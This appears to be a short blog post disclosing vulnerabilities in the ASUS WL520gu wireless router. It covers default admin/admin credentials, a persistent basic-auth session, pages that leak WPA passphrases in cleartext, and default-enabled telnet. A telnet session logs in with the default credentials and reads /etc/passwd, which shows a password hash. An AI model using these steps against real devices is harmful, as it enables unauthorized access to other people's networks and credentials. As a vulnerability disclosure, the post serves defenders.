ASUS WL520gu Wireless Router Multiples Vulnerabilities

The ASUS WL520gu Wireless Router (Shodan search) has a default account of admin/admin. It uses basic authentication so the “logout” function doesn’t properly terminate the web application session allowing persistent access from the browser that previous authenticated to it.

Also there are two pages that return cleartext passphrases and obscure them with javascript:

http://localhost/Basic_GOperation_Content.asp
WPA-PSK passphrase returned in clear (CVE-2013-78002):
wl520-passphrase

http://localhost/Advanced_Wireless_Content.asp
WPA Pre-Shared Key returned in clear (CVE-2013-78003):
wl520-wpa_preshared

By default telnet is enabled allowing remote admin access using the same default:

df:/home/df # telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.
WL-0022159F09A9 login: admin
Password:
[admin@WL-0022159F09A9 root]$ cd /etc
[admin@WL-0022159F09A9 etc]$ cat passwd
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/usr/local/root:/bin/sh
nobody:x:99:99:nobody:/:/sbin/nologin
[admin@WL-0022159F09A9 etc]$

Advertisements

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: